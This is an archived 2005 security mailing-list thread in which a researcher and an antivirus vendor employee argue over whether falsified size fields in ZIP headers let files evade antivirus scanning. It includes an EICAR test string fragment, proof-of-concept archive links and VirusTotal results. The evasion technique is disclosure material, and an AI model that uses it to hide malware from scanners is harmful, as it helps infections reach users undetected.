[<prev] [next>] [day] [month] [year] [list]
Message-ID: <96BCCB62FB25F746A54214CBA0FB94A8048F30@syb-ny-exc1.net.sybari.com>
From: steve_scholz at sybari.com (Steve Scholz)
Subject: Multiple
AVVendorIncorrectCRC32BypassVulnerability.
?
Sure it is a fair comment. Eicar a test file has been corrupt by you changing the archive. Do this with a real virus where the av scan engine looks at all the content and if certain portians are there it detects it. This poc only works with eicar not any known virus, to me that is no vulnerability.
Steve
________________________________
From: bipin gautam [mailto:visitbipin@...oo.com]
Sent: Sun 3/13/2005 9:06 AM
To: Steve Scholz
Cc: vuln@...unia.com; full-disclosure@...ts.grok.org.uk; bugtraq@...urityfocus.com
Subject: RE: [Full-disclosure] Multiple AVVendorIncorrectCRC32BypassVulnerability.
--- Steve Scholz <steve_scholz@...ari.com> wrote:
> ?
> Hi Bipin,
> Well just by definition of what eicar is all you did
> was corrupt a file and made it not useable. I am
> sure that any other executable would do the same.
> Try it with a real virus I am sure there will be
> enough code for the AV scanners to detect.
thats not fair to coment...
DID I CORRUPT THE eicar test string? no i didn't...
what did i did... then?
In the "local file header" & "data descriptor" of
the archive i just changed the compressed size and
uncompressed size of the archive to greater than the
actual file size.
who then? well, your unzip utility did... so did the
unzip utility built-in your AV scanner so that the
eicar was undetectable to most AV cauz they just check
the hash of the file to detect eicarts!
Result:
Unzip utilities and AV will successfully extract such
archive with filling some garbage data \x00 at the end
.(because the uncompressed file size was fake) still,
Any malicious code can execute without any problem
with the garbage at its bottom. This will successfully
bypass AV detection "even for a known malicious code",
"MOST OF THE TIME" if the AV detects the executable
comparing its total checksum!
Its true for some of those simple little viruses,
isn't it?
I didn't altered the eicar test string... in any ways.
Have a hex dump of the file and see the intact string
for yourself!
)O; is my english that bad... so that i can't
communicate properly?
I hope you understood what i mean to explain.
Moreover, If you are able to forge the CRC right,
'some' old av may even try to quarentine the test
virus (if it detect that) in either way it might still
result in a DoS if the uncompressed file size is
forged to few hunderd mb!@
if you are still unclear about the issue, and wounder
how the garbage data came at the end of the file...
http://www.geocities.com/visitbipin/winrar.html
This old advisory of mine should explain you clearly.
bipin
> --- Steve Scholz <steve_scholz@...ari.com> wrote:
> > Hi Bipin,
> > By design Eicar needs to be the exact string and
> on
> > the first line with nothing else following it. So
> > the file is not actually an Eicar I get this with
> > advanced zip repair. So now we won't detect this
> > because it is not Eicar.
> >
> >
>
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*PK...
> >
> > ./???quot;F?-?sp ?sp .
> eicar.comPK..
> > . . 7 k
>
> "not Eicar" so??? (O; It exactly did what it was
> intended to! TRY IT WITH OTHER EXECUDABLES THEN.
>
> In the 'local file header" & "data descriptor" if
> you
> change the compressed size and uncompressed size to
> greater than the actual file size there are many AV
> that can't scan the file properly.
> Most, unzip utilities will successfully extract such
> archive with some garbage data \x00 at the end "255
> bytes. (SO DOES THE AV ENGINE) The garbage data
> doesn't *that matter because any malicious code can
> "execute without any problem" with still the garbage
> at its end. "This will successfully bypass AV
> detection even for a known malicious code!" "MOST
> OF
> THE TIME" if the AV detects the executable comparing
> its total checksum!
>
> (but for effectiveness, FORGE the crc, first for
> real
> effectiveness)
>
>
>
> regards,
> bipin gautam
> get the updates in this issue at:
> http://www.geocities.com/visitbipin/
>
> secunia.com;
> > full-disclosure@...ts.grok.org.uk;
> > bugtraq@...urityfocus.com
> > Subject: [Full-disclosure] Re: [Private]Multiple
> AV
> > VendorIncorrectCRC32BypassVulnerability.
> >
> > Steve,
> > firstly... thankyou for all your coments.
> >
> > > The Antigen_s.zip does not contain a valid Eicar
> > > this info when repaired
> > > and opened is X5O!P%@AP[4\PZX
> > > We did catch it with a file filter.
> > > What was your intent with these files?
> >
> > OOPS! again my fault!!!
> > TRY:
> http://www.geocities.com/visitbipin/Antigen.zip
> >
> > my intension was to show, if the archive has
> > compressed size and uncompressed size set to
> greater
> > than the actual file size or less than the actual
> > file
> > size there are many AV that can't scan the file
> > properly.
> >
> > send
> > http://www.geocities.com/visitbipin/Antigen.zip
> > to virustotal.com and see for yourself!!!
> >
> > Download Accelerator successfully repairs this
> > archive
> > with some garbage data \x00 at the end "255 bytes"
> > Though, i was able to successfully execute
> eicar.com
> >
> > -bipin
> > updates at:
> > http://www.geocities.com/visitbipin/crc.html
> > ___________________My
> report!_______________________
> > This is a report processed by VirusTotal on
> > 03/12/2005
> > at 18:38:32 (CET) after scanning the file
> > "Antigen.zip" file.
> >
> > Antivirus Version Update Result
> > AntiVir 6.30.0.5 03.11.2005
> Eicar-Test-Signature
> > AVG 718 03.11.2005 EICAR_Test (+187)
>
> > BitDefender 7.0 03.12.2005 no virus
> found
> > ClamAV devel-20050307 03.10.2005
> > Eicar-Test-Signature
> >
> > DrWeb 4.32b 03.12.2005 no virus found
> > eTrust-Iris 7.1.194.0 03.12.2005 no virus found
>
> > eTrust-Vet 11.7.0.0 03.11.2005 no virus found
> > Fortinet 2.51 03.11.2005 no virus found
> > F-Prot 3.16a 03.11.2005
> EICAR_Test_File
> > Ikarus 2.32 03.11.2005
> EICAR-ANTIVIRUS-TESTFILE
> > Kaspersky 4.0.2.24 03.12.2005
> EICAR-Test-File
> > McAfee 4445 03.11.2005 no virus
> found
> > NOD32v2 1.1024 03.11.2005 archive
> damaged
> > Norman 5.70.10 03.10.2005 no virus
> found
> > Panda 8.02.00 03.12.2005 Eicar.Mod
> > Sybari 7.5.1314 03.12.2005 no virus
> found
> > Symantec 8.0 03.11.2005 no virus found
>
>
>
__________________________________
Do you Yahoo!?
Yahoo! Small Business - Try our new resources site!
http://smallbusiness.yahoo.com/resources/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050313/490475b9/attachment.html
Powered by blists - more mailing lists